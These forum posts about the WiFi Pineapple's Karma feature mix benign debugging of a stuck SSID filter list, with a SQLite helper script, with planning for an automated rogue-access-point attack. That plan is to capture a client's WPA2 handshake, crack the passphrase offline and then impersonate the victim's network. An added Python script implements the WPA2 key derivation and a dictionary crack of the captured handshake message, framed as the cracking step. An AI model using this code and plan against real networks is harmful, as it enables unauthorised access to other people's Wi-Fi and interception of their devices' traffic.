Posts posted by rpcodes
I ran a similar set of tests about a month ago, maybe more by now, with Win7, Android, and Ubuntu Linux clients. On the Tetra, but same software (Karma, etc.). I think that to accept a client that is looking for a WPA access point, the Pineapple would need some way to respond with the correct handshake (using tools like airng and the like maybe?)
In other words, it's not enough to reply "Yes, I am the WPA AP you want", like it does with open networks and Karma.
IIRC WPA is like:

Client sends some handshake info
AP replies with its handshake info
Everything matches, then the client connects; otherwise, no dice.

I'm thinking, is it possible to set up the Pineapple something like this:

1. listen for and collect the client's handshake / request to connect
2. send to a server to crack / brute force / etc. the password; again, I think air-ng or something may have this capability?
3. once cracked, send the handshake reply to the Pineapple
4. broadcast the handshake reply, so now the client thinks the Pineapple is its desired WPA2 AP

I have not investigated the sort of computational power it would take for a "simple" WPA2 password crack; this is just an idealized flow. Any WPA2 experts: am I on the right track at least?

I second your notion of trimming your pool size. I wonder, does the Pineapple interface allow us to filter out WPA-protected APs somehow? I will have to look again for this, curious...
SSIDs seem to be kept in /etc/pineapple/pineapple.db, a SQLite database. This is what I see:

sqlite> select * from ssid_list;
id,ssid
1,"XANADU-ZONE
"
2,""

So I can clear by doing

delete from ssid_list;

then replacing the modified database file. That works fine if I want to start over. I did more digging, and I'm not sure how it got into the state above anyway, where a newline seems to be appended. The issue started with the web console. But here is the table just using the web console again:

sqlite> select * from ssid_list;
id,ssid
1,Coconuts
2,"Added From Web Client"
3,HOME-A9E8-5

I will try and post more info when it happens again, esp. if I figure out how to recreate it.
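To check the "newline appended" theory from this post without touching the real box, here is an added example (written for this page, not rpcodes' or Hak5's code). It builds an in-memory SQLite table with the same two columns as the dump above, seeds it with constructed rows including one SSID that carries a trailing newline and one empty string, and then shows why an exact-match delete (what a CLI like del_ssid would most likely run) removes nothing while a whitespace-trimmed match does. The schema types, the exact bytes stored on a Pineapple, and the DELETE statement the Pineapple itself uses are assumptions; point DB_PATH at a copy of /etc/pineapple/pineapple.db only after backing it up.

```python
import sqlite3

# Constructed stand-in for /etc/pineapple/pineapple.db. Only the table name and
# the two column names (id, ssid) come from the dump on the page; the column
# types and the row contents below are assumptions made for this demo.
DB_PATH = ":memory:"
WS = " \t\r\n"   # characters TRIM() strips from both ends


def open_demo_db() -> sqlite3.Connection:
    con = sqlite3.connect(DB_PATH)
    con.execute("CREATE TABLE ssid_list (id INTEGER PRIMARY KEY, ssid TEXT)")
    con.executemany(
        "INSERT INTO ssid_list (ssid) VALUES (?)",
        # row 1 mimics the suspected bad state: SSID with a newline appended
        [("XANADU-ZONE\n",), ("",), ("Coconuts",), ("Added From Web Client",)],
    )
    con.commit()
    return con


def list_ssids(con: sqlite3.Connection) -> list:
    return [row[0] for row in con.execute("SELECT ssid FROM ssid_list ORDER BY id")]


def find_hidden_whitespace(con: sqlite3.Connection) -> list:
    """Rows that print identically to a clean SSID but will never match an exact-string delete."""
    bad = []
    for ssid in list_ssids(con):
        if ssid == "" or ssid != ssid.strip(WS):
            bad.append(repr(ssid))   # repr() makes the stray "\n" visible on the console
    return bad


def del_ssid_exact(con: sqlite3.Connection, ssid: str) -> int:
    """The naive delete; returns the number of rows removed (0 when a newline is stuck on the value)."""
    cur = con.execute("DELETE FROM ssid_list WHERE ssid = ?", (ssid,))
    con.commit()
    return cur.rowcount


def del_ssid_trimmed(con: sqlite3.Connection, ssid: str) -> int:
    """Same delete, but compares the stored value with surrounding whitespace stripped."""
    cur = con.execute("DELETE FROM ssid_list WHERE TRIM(ssid, ?) = ?", (WS, ssid))
    con.commit()
    return cur.rowcount


def clear_ssid_list(con: sqlite3.Connection) -> None:
    """Equivalent of the 'delete from ssid_list;' the post uses to start over."""
    con.execute("DELETE FROM ssid_list")
    con.commit()


if __name__ == "__main__":
    con = open_demo_db()
    print("suspicious rows:", find_hidden_whitespace(con))
    print("exact delete removed:", del_ssid_exact(con, "XANADU-ZONE"))
    print("trimmed delete removed:", del_ssid_trimmed(con, "XANADU-ZONE"))
    print("remaining:", list_ssids(con))
```

If the same check against a copy of the real database lists the stubborn entries with a visible "\n" in repr(), that confirms the theory; the blank entry ("") shows up in the same list, which would explain why it cannot be removed by name either.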
Additionally, I tried investigating using the hostapd karma commands. I think I am just making things worse though?

> karma_del_ssid
Invalid 'delete Karma SSID' command - exactly one argument, SSID, is required.
> kamra_del_ssid Test-SSID Number 1
Unknown command 'kamra_del_ssid'
> kamra_del_ssid "Test-SSID Number 1"
Unknown command 'kamra_del_ssid'
>
1.0.2 Tetra firmware. Reboot, etc., problem persists. The closest I could find seems to be fixed: https://forums.hak5.org/index.php?/topic/37619-problems-using-filtering/
Applies to web console and command line. Command line dump:

root@Pineapple:/# pineapple karma list_ssids
XANADU-ZONE
root@Pineapple:/# pineapple karma del_ssid XANADU-ZONE
Sucessfully removed SSID XANADU-ZONE
root@Pineapple:/# pineapple karma list_ssids
XANADU-ZONE

I think the problem has to do with spaces, not sure how exactly. Check this out:

root@Pineapple:/# pineapple karma add_ssid TEST-SSID Number 1
Sucessfully added SSID TEST-SSID
root@Pineapple:/# pineapple karma list_ssids
XANADU-ZONE
TEST-SSID
root@Pineapple:/# pineapple karma del_ssid TEST-SSID Number 1
Sucessfully removed SSID TEST-SSID
root@Pineapple:/# pineapple karma list_ssids
XANADU-ZONE

If I didn't know the "full" name of the SSID, I couldn't remove it. For now, where are these entries stored on the WiFi Pineapple so I can manually remove (all of) them? A button/command in Karma to clear all filters would be great also! Also note there is a blank entry that cannot be removed either. Anyone know a quick way to clear this Karma white/black list without a firmware reset?
Karma Jasager wpa
in WiFi Pineapple NANO
Mr-Protocol, thanks for the input. I think your steps are the same as mine, just written in simpler language. And you also add the deauth step; yes, I agree.
I was looking for a no-hands solution, so your step 3, can that be automated somehow, do you know? Similar to how Karma broadcasts beacons, I'd ultimately like to broadcast WPA APs the same way.
I also found this on the forums, which is basically step 1:
https://forums.hak5.org/index.php?/topic/38180-howto-capture-wpa-handshake-wifi-pineapple-nano/
So for the WPA experts: what do we use to actually generate the AP-side handshake? i.e. what are our cracking tools?
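To make the flow discussed in these posts (capture the client's handshake, crack it offline, only then answer as the AP) concrete, here is an added example written for this page; it is not code from rpcodes, Mr-Protocol or the WiFi Pineapple project. It implements the WPA2-PSK pieces from IEEE 802.11i that the posts reason about: the PMK from passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 rounds), the PTK from the two MACs and two nonces (PRF-512), and the HMAC-SHA1 MIC on EAPOL-Key messages 2 and 3. It then shows why a fake AP cannot just claim to be the network (its message 3 MIC fails under a guessed passphrase, so the client never installs keys) and how the captured message 2 from step 1 is cracked in step 2 by recomputing that MIC per candidate passphrase, which is in principle the same check tools like aircrack-ng run over a handshake capture. The MACs, nonces, passphrases, key_info values and the empty key-data fields are constructed assumptions; a real capture needs pcap parsing and carries RSN IEs and an encrypted GTK in the key data.

```python
import hashlib
import hmac
import struct

# --- constructed demo inputs (not a real capture) ---
SSID = b"XANADU-ZONE"                  # SSID from the page; it is the PBKDF2 salt
AA = bytes.fromhex("00c0ca000001")     # AP MAC (made up)
SPA = bytes.fromhex("001122334455")    # station MAC (made up)
ANONCE = bytes(range(32))              # fixed nonces so the run is reproducible
SNONCE = bytes(range(32, 64))
MIC_LEN = 16
# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32)
# + key IV(16) + key RSC(8) + key ID(8) = 81 bytes before the MIC field
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32). This is the only step that costs CPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces). KCK is PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def build_eapol_key(key_info: int, replay: int, nonce: bytes,
                    key_data: bytes = b"", mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Minimal EAPOL-Key frame (RSN descriptor, CCMP key length); IV/RSC/ID left zero for the demo."""
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay)
            + nonce + bytes(16) + bytes(8) + bytes(8)
            + mic + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL v2, packet type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (AKM 2) MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def sign(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def verify(kck: bytes, frame: bytes) -> bool:
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def run_handshake(client_pass: str, ap_pass: str, ssid: bytes = SSID):
    """MIC-bearing part of the 4-way handshake. Returns (msg2, AP accepts msg2, client accepts msg3)."""
    kck_sta = derive_ptk(derive_pmk(client_pass, ssid), AA, SPA, ANONCE, SNONCE)[:16]
    kck_ap = derive_ptk(derive_pmk(ap_pass, ssid), AA, SPA, ANONCE, SNONCE)[:16]
    # msg 1 (AP -> STA) carries only ANonce and no MIC: anyone can send it, which is
    # why a rogue AP (or a deauth + re-association) can easily provoke msg 2.
    # msg 2 (STA -> SPA's view of the AP): SNonce + MIC under the station's KCK.
    msg2 = sign(kck_sta, build_eapol_key(0x010a, 1, SNONCE))   # key_info value is illustrative
    # msg 3 (AP -> STA): ANonce again + MIC under the AP's KCK; the station installs keys only if it verifies.
    msg3 = sign(kck_ap, build_eapol_key(0x13ca, 2, ANONCE))
    return msg2, verify(kck_ap, msg2), verify(kck_sta, msg3)


def crack_msg2(msg2: bytes, candidates, ssid: bytes = SSID):
    """Offline step 2: recompute the msg 2 MIC per candidate passphrase; a match reveals the PSK."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for cand in candidates:
        kck = derive_ptk(derive_pmk(cand, ssid), AA, SPA, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return cand
    return None


if __name__ == "__main__":
    # Known-answer check from the 802.11i annex: passphrase "password", SSID "IEEE"
    assert derive_pmk("password", b"IEEE").hex().startswith("f42c6fc5")
    msg2, ap_ok, sta_ok = run_handshake("correct horse", "correct horse")
    print("real AP: AP accepts msg2 =", ap_ok, "| client accepts msg3 =", sta_ok)
    _, ap_ok, sta_ok = run_handshake("correct horse", "rogue-guess")
    print("rogue AP: AP accepts msg2 =", ap_ok, "| client accepts msg3 =", sta_ok)
    print("cracked:", crack_msg2(msg2, ["password", "letmein", "correct horse", "hunter2"]))
```

The point for the Pineapple pipeline: message 2 is all the rogue side can collect without the passphrase, and it is enough to crack offline because the MIC binds the candidate PSK to nonces and MACs that are visible in the capture. Until that crack finishes, nothing the Pineapple broadcasts can produce a message 3 the client will accept, which is why the automation has to be "capture, crack, then bring up a real WPA2 AP with the recovered key" rather than a Karma-style yes-to-everything reply.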